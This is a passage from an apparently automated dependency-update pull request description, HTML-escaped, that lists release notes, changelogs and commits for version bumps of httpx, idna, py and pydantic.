2024)\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReintroduced supposedly-private \u003ccode\u003eURLTypes\u003c/code\u003e shortcut. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/2673\"\u003e#2673\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.27.1 (27th August, 2024)\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSupport for \u003ccode\u003ezstd\u003c/code\u003e content decoding using the python \u003ccode\u003ezstandard\u003c/code\u003e package is added. Installable using \u003ccode\u003ehttpx[zstd]\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3139\"\u003e#3139\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eImproved error messaging for \u003ccode\u003eInvalidURL\u003c/code\u003e exceptions. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3250\"\u003e#3250\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003eapp\u003c/code\u003e type signature in \u003ccode\u003eASGITransport\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3109\"\u003e#3109\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.27.0 (21st February, 2024)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/httpx/commit/26d48e0634e6ee9cdc0533996db289ce4b430177\"\u003e\u003ccode\u003e26d48e0\u003c/code\u003e\u003c/a\u003e Version 0.28.1 (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3445\"\u003e#3445\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/httpx/commit/89599a9541af14bcf906fc4ed58ccbdf403802ba\"\u003e\u003ccode\u003e89599a9\u003c/code\u003e\u003c/a\u003e Fix \u003ccode\u003everify=False\u003c/code\u003e, \u003ccode\u003ecert=...\u003c/code\u003e case. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3442\"\u003e#3442\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/httpx/commit/8ecb86f0d74ffc52d4663214fae9526bee89358d\"\u003e\u003ccode\u003e8ecb86f\u003c/code\u003e\u003c/a\u003e Add test for request params behavior changes (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3364\"\u003e#3364\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3440\"\u003e#3440\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/httpx/commit/0cb7e5a2e736628e2f506d259fcf0d48cd2bde82\"\u003e\u003ccode\u003e0cb7e5a\u003c/code\u003e\u003c/a\u003e Bump the python-packages group with 11 updates (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3434\"\u003e#3434\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/httpx/commit/15e21e9ea3cad4f06e22a7e704aabefdf43d2e29\"\u003e\u003ccode\u003e15e21e9\u003c/code\u003e\u003c/a\u003e Updating deprecated docstring Client() class (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3426\"\u003e#3426\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/httpx/commit/80960fa31918d7663c3f4c3ad61661cf0e80628f\"\u003e\u003ccode\u003e80960fa\u003c/code\u003e\u003c/a\u003e Version 0.28.0. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3419\"\u003e#3419\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/httpx/commit/a33c87852b8a0dddc65e5f739af1e0a6fca4b91f\"\u003e\u003ccode\u003ea33c878\u003c/code\u003e\u003c/a\u003e Fix \u003ccode\u003eextensions\u003c/code\u003e type annotation. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3380\"\u003e#3380\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/httpx/commit/ce7e14da27abba6574be9b3ea7cd5990556a9343\"\u003e\u003ccode\u003ece7e14d\u003c/code\u003e\u003c/a\u003e Error on verify as str. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3418\"\u003e#3418\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/httpx/commit/47f4a96ffaaaa07dca1614409549b5d7a6e7af49\"\u003e\u003ccode\u003e47f4a96\u003c/code\u003e\u003c/a\u003e Handle empty zstd responses (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3412\"\u003e#3412\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/httpx/commit/189fc4bcbe5f314128775dec66a616ac9a31ad48\"\u003e\u003ccode\u003e189fc4b\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.md, fix typo(s) (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3406\"\u003e#3406\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/encode/httpx/compare/0.23.0...0.28.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `idna` from 3.7 to 3.10\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/releases\"\u003eidna's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.10\u003c/h2\u003e\n\u003cp\u003eNo release notes provided.\u003c/p\u003e\n\u003ch2\u003ev3.9\u003c/h2\u003e\n\u003cp\u003eNo release notes provided.\u003c/p\u003e\n\u003ch2\u003ev3.8\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix regression where IDNAError exception was not being produced for certain inputs.\u003c/li\u003e\n\u003cli\u003eAdd support for Python 3.13, drop support for Python 3.5 as it is no longer testable.\u003c/li\u003e\n\u003cli\u003eDocumentation improvements\u003c/li\u003e\n\u003cli\u003eUpdates to package testing using Github actions\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Hugo van Kemenade for contributions to this release.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/kjd/idna/compare/v3.7...v3.8\"\u003ehttps://github.com/kjd/idna/compare/v3.7...v3.8\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/blob/master/HISTORY.rst\"\u003eidna's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e3.10 (2024-09-15)\n+++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eReverted to Unicode 15.1.0 data. Unicode 16 has some significant changes\nto UTS46 processing that will require more work to properly implement.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e3.9 (2024-09-13)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 16.0.0\u003c/li\u003e\n\u003cli\u003eDeprecate setup.cfg in favour of pyproject.toml\u003c/li\u003e\n\u003cli\u003eUse ruff for code formatting\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Waket Zheng for contributions to this release.\u003c/p\u003e\n\u003cp\u003e3.8 (2024-08-23)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix regression where IDNAError exception was not being produced for\ncertain inputs.\u003c/li\u003e\n\u003cli\u003eAdd support for Python 3.13, drop support for Python 3.5 as it is no\nlonger testable.\u003c/li\u003e\n\u003cli\u003eDocumentation improvements\u003c/li\u003e\n\u003cli\u003eUpdates to package testing using Github actions\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Hugo van Kemenade for contributions to this release.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/729225d8b0c58bc66bb38d1d0faf281a757ece59\"\u003e\u003ccode\u003e729225d\u003c/code\u003e\u003c/a\u003e Release v3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/3eef1680132907e90afb0feb29136f6895001f3c\"\u003e\u003ccode\u003e3eef168\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/194\"\u003e#194\u003c/a\u003e from kjd/revert-unicode-16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/ceca619a214c816e04c7c233565280bf3998c938\"\u003e\u003ccode\u003ececa619\u003c/code\u003e\u003c/a\u003e Revert Unicode 16.0.0 data updates\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/c43ac75cf649511c3d593164a32a3ff9cd0cdcd1\"\u003e\u003ccode\u003ec43ac75\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/191\"\u003e#191\u003c/a\u003e from kjd/release-3.9\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/1b8800a4d0c76126ab2d3e28c7e62f567cbe69f8\"\u003e\u003ccode\u003e1b8800a\u003c/code\u003e\u003c/a\u003e Release v3.9\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/a1fd16821734235fb6ce4e0283a49a71d61535d2\"\u003e\u003ccode\u003ea1fd168\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/190\"\u003e#190\u003c/a\u003e from kjd/unicode-16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/7732c6153e07946f1bf5cdea96817264d305b7cc\"\u003e\u003ccode\u003e7732c61\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into unicode-16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/4ed183d95cf5cdfc98bb867b9e4b33a3fd13ca9b\"\u003e\u003ccode\u003e4ed183d\u003c/code\u003e\u003c/a\u003e Refactor membership test\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/762216bd7b1d0c45937703ea0c7632360e32c85b\"\u003e\u003ccode\u003e762216b\u003c/code\u003e\u003c/a\u003e Format with ruff\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/580ece955f7e127094b21b40761be6b70ab62aef\"\u003e\u003ccode\u003e580ece9\u003c/code\u003e\u003c/a\u003e Implement changes to UTS46 algorithm\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/kjd/idna/compare/v3.7...v3.10\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `py` from 1.10.0 to 1.11.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/py/blob/master/CHANGELOG.rst\"\u003epy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.11.0 (2021-11-04)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Python 3.11\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eNO_COLOR\u003c/code\u003e environment variable\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.5 =\u0026gt; 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/447bac514febbb5433963582103d48bb27b3db17\"\u003e\u003ccode\u003e447bac5\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/6d003d9fee08542b9a5ca663568cb30c75d6c27c\"\u003e\u003ccode\u003e6d003d9\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/9cf613f3c21ca31f4a1ee9a70e6bd31dc3fe42d9\"\u003e\u003ccode\u003e9cf613f\u003c/code\u003e\u003c/a\u003e Declare support for Python 3.8-3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/d831150a3502363c9ca7242122d8e6cbd229169e\"\u003e\u003ccode\u003ed831150\u003c/code\u003e\u003c/a\u003e Update python_requires: Python 3.4 was already dropped\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e68532e9d67b089b17f1c96a708ff5f8ccf8bc8b\"\u003e\u003ccode\u003ee68532e\u003c/code\u003e\u003c/a\u003e Update CHANGELOG for 1.11.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/2f03e5a7fd9eb95db110cfd1bf40b987757f9d48\"\u003e\u003ccode\u003e2f03e5a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/258\"\u003e#258\u003c/a\u003e from blueyed/NO_COLOR\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e116b2bb8e1da9e8aef33c3606bd3d357ae28570\"\u003e\u003ccode\u003ee116b2b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/275\"\u003e#275\u003c/a\u003e from pytest-dev/upgrade-vendor-libs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f3a1a59d7d701a76680c2d0b0bd582311b00ded0\"\u003e\u003ccode\u003ef3a1a59\u003c/code\u003e\u003c/a\u003e remove build pin again\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f6cbf2814a2cc355d0a795233a32dc1285eec93b\"\u003e\u003ccode\u003ef6cbf28\u003c/code\u003e\u003c/a\u003e try to use pipx tox\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/3fe9ad76257860bfcdb25a23539972759ce348ed\"\u003e\u003ccode\u003e3fe9ad7\u003c/code\u003e\u003c/a\u003e try to use preinstalled tox\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytest-dev/py/compare/1.10.0...1.11.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pydantic` from 1.10.13 to 2.11.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pydantic/pydantic/releases\"\u003epydantic's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.11.7 2025-06-14\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eCopy \u003ccode\u003eFieldInfo\u003c/code\u003e instance if necessary during \u003ccode\u003eFieldInfo\u003c/code\u003e build by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/11980\"\u003epydantic/pydantic#11980\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pydantic/pydantic/compare/v2.11.6...v2.11.7\"\u003ehttps://github.com/pydantic/pydantic/compare/v2.11.6...v2.11.7\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.11.6 2025-06-13\u003c/h2\u003e\n\u003ch2\u003ev2.11.6 (2025-06-13)\u003c/h2\u003e\n\u003ch3\u003eWhat's Changed\u003c/h3\u003e\n\u003ch4\u003eFixes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eRebuild dataclass fields before schema generation by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/11949\"\u003e#11949\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAlways store the original field assignment on \u003ccode\u003eFieldInfo\u003c/code\u003e by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/11946\"\u003e#11946\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pydantic/pydantic/compare/v2.11.5...v2.11.6\"\u003ehttps://github.com/pydantic/pydantic/compare/v2.11.5...v2.11.6\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.11.5 2025-05-22\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eCheck if \u003ccode\u003eFieldInfo\u003c/code\u003e is complete after applying type variable map by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/11855\"\u003e#11855\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDo not delete mock validator/serializer in \u003ccode\u003emodel_rebuild()\u003c/code\u003e by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/11890\"\u003e#11890\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDo not duplicate metadata on model rebuild by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/11902\"\u003e#11902\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pydantic/pydantic/compare/v2.11.4...v2.11.5\"\u003ehttps://github.com/pydantic/pydantic/compare/v2.11.4...v2.11.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.11.4 2025-04-29\u003c/h2\u003e\n\u003ch3\u003eWhat's Changed\u003c/h3\u003e\n\u003ch4\u003ePackaging\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eBump \u003ccode\u003emkdocs-llmstxt\u003c/code\u003e to v0.2.0 by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/11725\"\u003e#11725\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eChanges\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eAllow config and bases to be specified together in \u003ccode\u003ecreate_model()\u003c/code\u003e by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/11714\"\u003e#11714\u003c/a\u003e.\nThis change was backported as it was previously possible (although not meant to be supported)\nto provide \u003ccode\u003emodel_config\u003c/code\u003e as a field, which would make it possible to provide both configuration\nand bases.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eFixes\u003c/h4\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pydantic/pydantic/blob/main/HISTORY.md\"\u003epydantic's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.11.7 (2025-06-14)\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pydantic/pydantic/releases/tag/v2.11.7\"\u003eGitHub release\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eWhat's Changed\u003c/h3\u003e\n\u003ch4\u003eFixes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eCopy \u003ccode\u003eFieldInfo\u003c/code\u003e instance if necessary during \u003ccode\u003eFieldInfo\u003c/code\u003e build by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/11898\"\u003e#11898\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.11.6 (2025-06-13)\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pydantic/pydantic/releases/tag/v2.11.6\"\u003eGitHub release\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eWhat's Changed\u003c/h3\u003e\n\u003ch4\u003eFixes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eRebuild dataclass fields before schema generation by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/11949\"\u003e#11949\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAlways store the original field assignment on \u003ccode\u003eFieldInfo\u003c/code\u003e by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/11946\"\u003e#11946\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.11.5 (2025-05-22)\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pydantic/pydantic/releases/tag/v2.11.5\"\u003eGitHub release\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eWhat's Changed\u003c/h3\u003e\n\u003ch4\u003eFixes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eCheck if \u003ccode\u003eFieldInfo\u003c/code\u003e is complete after applying type variable map by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/11855\"\u003e#11855\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDo not delete mock validator/serializer in \u003ccode\u003emodel_rebuild()\u003c/code\u003e by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/11890\"\u003e#11890\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDo not duplicate metadata on model rebuild by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/11902\"\u003e#11902\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.11.4 (2025-04-29)\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pydantic/pydantic/releases/tag/v2.11.4\"\u003eGitHub release\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eWhat's Changed\u003c/h3\u003e\n\u003ch4\u003ePackaging\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eBump \u003ccode\u003emkdocs-llmstxt\u003c/code\u003e to v0.2.0 by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/11725\"\u003e#11725\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eChanges\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eAllow config and bases to be specified together in \u003ccode\u003ecreate_model()\u003c/code\u003e by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/11714\"\u003e#11714\u003c/a\u003e.\nThis change was backported as it was previously possible (although not meant to be supported)\nto provide \u003ccode\u003emodel_config\u003c/code\u003e as a field, which would make it possible to provide both configuration\nand bases.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/5f033e46c54fea1b59b6894d6527daf49475e690\"\u003e\u003ccode\u003e5f033e4\u003c/code\u003e\u003c/a\u003e Prepare release v2.11.7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/c3368b83c411f421a7322959bc29f3bea4bd252a\"\u003e\u003ccode\u003ec3368b8\u003c/code\u003e\u003c/a\u003e Copy \u003ccode\u003eFieldInfo\u003c/code\u003e instance if necessary during \u003ccode\u003eFieldInfo\u003c/code\u003e build (\u003ca href=\"https://redirect.github.com/pydantic/pydantic/issues/11980\"\u003e#11980\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/3987b23db4b31ff35e9fa15c21c0c1d1c9808838\"\u003e\u003ccode\u003e3987b23\u003c/code\u003e\u003c/a\u003e Prepare release v2.11.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/dc7a9d20bee55a3a6e7397ee46abfcd9057b627b\"\u003e\u003ccode\u003edc7a9d2\u003c/code\u003e\u003c/a\u003e Always store the original field assignment on \u003ccode\u003eFieldInfo\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/c284c279a5b8c95d32ab5ec31d2511b3b27bfa87\"\u003e\u003ccode\u003ec284c27\u003c/code\u003e\u003c/a\u003e Rebuild dataclass fields before schema generation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/5e6d1dc71fe9bd832635cb2e9b4af92286fd00b8\"\u003e\u003ccode\u003e5e6d1dc\u003c/code\u003e\u003c/a\u003e Prepare release v2.11.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/1b63218c42b515bd1f6b0dd323190236ead14bdb\"\u003e\u003ccode\u003e1b63218\u003c/code\u003e\u003c/a\u003e Do not duplicate metadata on model rebuild (\u003ca href=\"https://redirect.github.com/pydantic/pydantic/issues/11902\"\u003e#11902\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/5aefad873b3dfd60c419bd081ffaf0ac197c7b60\"\u003e\u003ccode\u003e5aefad8\u003c/code\u003e\u003c/a\u003e Do not delete mock validator/serializer in \u003ccode\u003emodel_rebuild()\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/8fbe6585f4d6179e5234ab61de00059c52e57975\"\u003e\u003ccode\u003e8fbe658\u003c/code\u003e\u003c/a\u003e Check if \u003ccode\u003eFieldInfo\u003c/code\u003e is complete after applying type variable map\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/12b371a0f7f800bf65daa3eaada1b4348348d9c4\"\u003e\u003ccode\u003e12b371a\u003c/code\u003e\u003c/a\u003e Update documentation about \u003ccode\u003e@dataclass_transform\u003c/code\u003e support\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pydantic/pydantic/compare/v1.10.13...v2.11.7\"\u003ecompare 